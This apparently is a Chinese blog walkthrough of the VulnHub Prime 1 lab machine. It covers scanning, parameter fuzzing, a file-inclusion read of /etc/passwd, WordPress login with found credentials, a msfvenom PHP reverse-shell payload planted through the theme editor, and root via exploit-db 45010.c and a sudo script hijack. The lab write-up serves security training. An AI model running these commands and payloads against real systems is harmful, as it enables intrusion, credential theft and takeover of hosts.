prime 1 靶场渗透测试

最新推荐文章于 2025-03-20 23:21:01 发布
最新推荐文章于 2025-03-20 23:21:01 发布
阅读量1.4k 收藏 30
点赞数 19
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jianmuhtb/article/details/131970024
版权

prime 1 靶场渗透测试

一、环境部署

靶机:prime1 下载地址:https://download.vulnhub.com/prime/Prime_Series_Level-1.rar

攻击机:kali Linux2023.2

环境:VMware

网络:两机均为nat

二、信息收集

C段扫描

nmap 196.168.XX.1/24

端口扫描

nmap -sP 192.168.xx.xx

发现22,80端口为开放状态,访问http://192.168.48.131

发现网页内容为一张图片http://192.168.48.131/hacknpentest.png

查看http://192.168.48.131/robots.txt

wget http://192.168.48.131/hacknpentest.png
strings hacknpentest.png   //查看图片是否具有隐写信息
exiftool hacknpentest.png

<html>
<title>HacknPentest</title>
<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>

</html>

网页源代码也没有相关信息,发现图片没有隐写信息

三、目录爆破

dirb http://192.168.48.131
image-20230726181838255

访问http://192.168.48.131/dev

image-20230726182001901

提示需要进一步挖掘,于是尝试爆破特定文件

dirb http://192.168.48.131 -X .txt,.php,.rar,.zip,.tar

image-20230726182420316

找到3个界面:

  • http://192.168.48.131/image.php
  • http://192.168.48.131/index.php
  • http://192.168.48.131/secret.txt

分别访问

image-20230726183039476

四、参数爆破

提示使用FUZZ在已知的两个PHP页面进行参数爆破

wfuzz的默认字典位置:/usr/share/wfuzz/wordlist/

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 7 -u  http://192.168.48.131/image.php?FUZZ=location.txt

没有结果

image-20230726184310251

尝试另一个php:http://192.168.48.131/index.php

image-20230726184423676

找到参数:file

构造URL:http://192.168.48.131/index.php?file=location.txt

curl http://192.168.48.131/index.php?file=location.txt

image-20230726184714723

提示说secrettier360是另一个php的参数

构造:http://192.168.48.131/image.php?secrettier360=

提示参数正确:finaly you got the right parameter

五、文件泄露

尝试文件泄露漏洞:http://192.168.48.131/image.php?secrettier360=/etc/passwd

访问以上地址:成功,结果如下:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false victor:x:1000:1000:victor,,,:/home/victor:/bin/bash mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false saket:x:1001:1001:find password.txt file in my directory:/home/saket: sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin

里面有一串提示:find password.txt file in my directory:/home/saket

http://192.168.48.131/image.php?secrettier360=/home/saket/password.txt

curl一下

image-20230726185826310

里面有一串:follow_the_ippsec,联想之前发现这个靶机部署了wordpress网站,或者说有没有可能是ssh的密码,先尝试ssh

image-20230726190205104

六、wordpress漏洞挖掘

尝试从wordpress入手

image-20230726190408611

wordpress版本是5.2.2,加上之前的apache2.4.18,搜索一下有没有漏洞

searchsploit wordpress 5.2
searchsploit apache 2.4

image-20230726190741809

image-20230726191009317

有漏洞,但是不会用。继续从wordpress入手

用wpscan对网站进行扫描

wpscan --url http://192.168.48.131/wordpress/ -eu  //eu挖掘网站用户

image-20230726191939329

找到一个用户:victor

结合之前的密码:follow_the_ippsec

尝试在http://192.168.48.131/wordpress/wp-login.php登录

image-20230726192157977

成功!

尝试插件栏里有没有文件上传漏洞http://192.168.48.131/wordpress/wp-admin/plugin-install.php

image-20230726192517328

并没有,难过,只能找其他了

发现主题编辑器里有一个php页面可写

image-20230726193040478

七、反弹连接shell

生成反弹连接木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.48.130 lport=4444 -o shell.php

image-20230726193348412

复制php代码到网页中的secret.php中并update

好的,php代码已经更新到靶机中了,怎么执行呢?

image-20230726193709993

构造url:http://192.168.48.131/wordpress/wp-content/themes/twentynineteen/secret.php

当然,执行之前记得先开启端口监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.48.130
lhost => 192.168.48.131
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.48.130   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
msf6 exploit(multi/handler) > exploit

在浏览器地址栏输入刚刚构造的url执行我们上传的secret.php

image-20230726204301358

连接成功

python优化回显

python -c 'import pty;pty.spawn("/bin/bash")'

操作一下:发现有一个enc文件,还有一个user.txt,但是并不会用,暂时搁置

www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l                      
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ cd /home/saket/
<ml/wordpress/wp-content/themes/twentynineteen$ cd /home/saket/              
www-data@ubuntu:/home/saket$ ls
ls
enc  password.txt  user.txt
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ cd enc
cd enc
bash: cd: enc: Not a directory
www-data@ubuntu:/home/saket$ cat enc
cat enc
cat: enc: Permission denied
www-data@ubuntu:/home/saket$ sudo /home/saket/enc
sudo /home/saket/enc
enter password: af3c658dcf9d7190da3153519c003456
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ ls
ls
enc  password.txt  user.txt

八、内核漏洞提权

查看内核版本,寻找内核漏洞:

www-data@ubuntu:/home/saket$ uname -r
uname -r
4.10.0-28-generic

searchsploit linux 4.10

上传提权文件:(上传到/tmp的原因是任何用户对/tmp目录都具有读写权限)

upload /usr/share/exploitdb/exploits/linux/local/45010.c /tmp/45010.c

gcc 45010.c -o 45010
ls
42136.c
43345
43345.c
45010
45010.c
VMwareDnD
systemd-private-0e17a1cdd0484c2cb056cf711d2f2ea5-colord.service-YPzF2p
systemd-private-0e17a1cdd0484c2cb056cf711d2f2ea5-rtkit-daemon.service-YRRtS8
systemd-private-0e17a1cdd0484c2cb056cf711d2f2ea5-systemd-timesyncd.service-FzfPXv
vmware-root
chmod +x 45010
./45010
whoami
root   //提权成功

cd /root
ls
enc
enc.cpp
enc.txt
key.txt
root.txt
sql.py
t.sh
wfuzz
wordpress.sql
whoami
root
cat root.txt
b2b17036da1de94cfb024540a8e7075a   //获得flag

九、另一种解法,AES解密

利用/home/saket/目录下的en加密文件解密之后来解

./enc
//提示需要密码
密码哪里找呢?尝试用
find / -name "*backup*" 2>/dev/null | less | sort

找到一个看起来像的:/opt/backup/server_database/backup_pass

看一下

cat /opt/backup/server_database/backup_pass
//得到一个密码:
your password for backup_database file enc is 

"backup_password"

./enc 输入backup_password,成功解密,得到enc.txt和key.txt,那必然是密文和密钥

密文:“nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=”

密钥:“366a74cb3c959de17d61db30591c39d1”

明文:"Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> “tribute_to_ippsec”

Victor,"

image-20230727123556506

使用saket:tribute_to_ippsec登录

然后sudo -l 查看可执行的root权限命令

$ sudo -l
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found  //提示创建/tmp/challenge

$ echo '#!/bin/bash' > challenge
$ echo '/bin/bash' >> challenge
$ chmod +x challenge
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:/tmp# whoami
root
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
enc  enc.cpp  enc.txt  key.txt  root.txt  sql.py  t.sh  wfuzz  wordpress.sql
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
//提权成功,得到flag

$ echo ‘/bin/bash’ >> challenge
$ chmod +x challenge
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:/tmp# whoami
root
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
enc enc.cpp enc.txt key.txt root.txt sql.py t.sh wfuzz wordpress.sql
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
//提权成功,得到flag
Jianmuhtb
关注
vulnhub靶场-Prime1
ad12456的博客
03-30 3029
靶场练习,
Prime1靶场通关
weixin_64751732的博客
01-04 985
Prime1靶场通关,渗透测试
一次prime1靶机的渗透测试
8888的博客
06-19 1263
什么也没有,说明我们找的参数不对,这里我们可以继续用FUZZ进行爆破参数,但是Linux里面,密码大多数存储在 /etc/passwd里面,我们试一下。查找对应的漏洞版本,后面有一个脚本,我们需要把它编译为我们需要利用的,然后传到目标靶机里面,然后执行,就可以提升到root权限。爆出信息,接下来我们进行提权获取root权限,因为爆出了操作系统,我们查看操作系统的漏洞,进入msfconsole。这里我们可以利用WordPress的漏洞,我们可以用漏扫工具扫一下,
Prime: 1靶场渗透测试
最新发布
sucker的博客
03-20 1099
登录进入之后,利用主题编辑器(Appearance-Theme Editor)的漏洞进行反弹代码的上传。通过观察上述的提示发现密码放在/home/saket/password.txt,结合刚才发现的读取文件到漏洞,我们构造一个payload去读取用户密码。通过观察上述的提示发现密码放在/home/saket/password.txt,结合刚才发现的读取文件到漏洞,我们构造一个payload去读取用户密码。需要让靶场下载未编译的exp原文件,然后再进行编译。4,测试index.php的参数,执行如下命令。
【vulnhub靶场PRIME:1打靶过程记录
didiplus
07-17 3494
最近发现一个很有趣的靶场集合,里面涵盖了一些基本的漏洞,我们通过漏洞复现。了解一些网络安全的一些基本操作。
Prime靶场
wcl20010的博客
05-02 520
prime靶场(vulnhub) 靶场地址:链接:https://pan.baidu.com/s/1jsccNmrmhG2dPuaz6zGwmA 提取码:ap5g 目录 X shell 连接 kali: #首先查看kali是否打开了22端口。ssh协议:ssh远程连接 netstat -an|grep 22 #打开服务 service ssh start 1. 主机发现: #采用nmap nmap -sP 192.168.128.1/24 #直接对128这个网段进行扫描,-sP代表只进行p
Vulnhub之prime-1靶场[渗透测试]
qq_60115503的博客
08-29 1227
将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透。
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
vuInhub靶场实战系列-prime:1
06-05
vuInhub靶场实战系列-prime:1
oscp备考,oscp系列——Wintermute-v1靶场,两台靶机内网渗透,LFI漏洞,screen4.5提权,struts2.3远程代码执行漏洞,CVE-2017-16995提权
2202_75361164的博客
02-15 1435
oscp备考,oscp系列——Wintermute-v1靶场,两台靶机内网渗透,LFI漏洞,screen4.5提权,struts2.3远程代码执行漏洞,CVE-2017-16995提权难度简单。 - 对于低权限shell获取涉及:ntopng弱口令,信息收集得到目录,LFI漏洞 - 对于提权:screen4.5提权 - 对于内网:struts2.3远程代码执行漏洞,Ubuntu内核提权
Prime_Series_Level-1靶场,wpscan爆破,LFI漏洞,wordpress更改文件getshell,ubuntu内核提权
2202_75361164的博客
02-20 576
oscp备考,oscp系列——Prime_Series_Level-1靶场,wpscan爆破,LFI漏洞,wordpress更改文件getshell,ubuntu内核提权难度简单偏上对于低权限shell获取涉及:wpscan爆破,LFI漏洞,wordpress更改文件getshell对于提权:ubuntu内核提权。
Vulnhub-靶机-PRIME: 1
weixin_45042115的博客
10-03 1667
今天发现了一个有趣的靶机,加载到本地VMware Workstation工作站进行漏洞复现 靶机下载地址 https://www.vulnhub.com/entry/prime-1,358/ 对目标进行扫描发现开放端口信息 nmap -sS -sV -p- -T5 100.100.100.130 浏览器访问,并对其进行目录扫描 dirb 描目录发现了/wordpress目录和一些其他的页面 对wordpress进行扫描 wpscan--url http://rip/wordpress/ --
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 2061
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
红队渗透靶场prime1.0(超详细!)
xf555er的博客
01-03 1628
WordPress是一个免费的开源内容管理系统(CMS),可以用来创建和管理网站或博客。它是由PHP语言和MySQL数据库构建的,并且拥有大量的插件和主题,可以让您轻松地自定义网站的外观和功能。
0x01--Prime_Series_Level-1靶场
growler67
09-16 2155
001靶场介绍 Prime是vulnhub靶场环境的一个简单的利用靶场,我们可以在vulnhub的官网里搜索到它,Prime系列共有六个靶场,本次使用的是19年出的第一个靶场环境。 介绍及下载链接:https://www.vulnhub.com/entry/prime-1,358 002–安装 靶场下载后是一个压缩文件,解压后用vm打开就行了,默认网络连接方式是nat,开机后自动获取VM虚拟网卡的dhcp地址。 查看本地的nat网段的操作如下: 003–攻击 本次环境模拟在未知具体ip地址的环境进行渗
prime1主机渗透
w1157673482的博客
03-01 581
prime1主机渗透
一次prime1靶场红队渗透实战,从主机发现到Linux内核漏洞提权
QQQPPPAAALLLZZZ的博客
07-03 1075
使用了namp端口和存活主机扫描 ,dir目录扫描, FUZZ参数扫描 , MSF反弹连接,LINUX内核提权。完成了从访问页面->获取后台管理员权限 -> 获取操作系统权限 -> 获取root权限的全过程。
Vulnhub靶机:PRIME_ 1
LainWith的博客
12-10 670
Prime(此系列共1台)发布日期:2019年9月1日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描目录爆破文件扩展名爆破强制访问文件包含漏洞WordPress利用内核提权。
红队靶场prime1靶机复现思路,wordpress反弹shell,shell执行ubuntu内核提权
m0_58116751的博客
05-18 1858
OK,我们看到目录扫描完毕,我们大致扫一眼就能看到里面最敏感的我认为就是/wordpress/w-admin 我们在做渗透测试的时候需要有一定的嗅觉,结合我们之前在nmap脚本扫描中确实看到了wordpress的个平台那么这个目录90%就是他的登录界面了然后还有几个可疑目录。我们猜想是正确的,我们简单尝试几个弱口令,都失败了进不去,那没有办法,我们暂且将他搁置,我们去看下背的目录,看能不能找到一些别的信息。我们去image看下。我们看到他的默认页面是kali的图片,看一眼源码也没有发现什么可以利用的东西。
Prime95: 深度剖析CPU稳定性测试工具
1. Prime95软件介绍 Prime95是一款用于测试个人电脑CPU稳定性的专用工具软件。它通过执行高负荷的数学运算来模拟极端工作条件,检测CPU在极限状态下的表现。软件的残酷性使得其在拷机软件中脱颖而出,被认为是检验...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值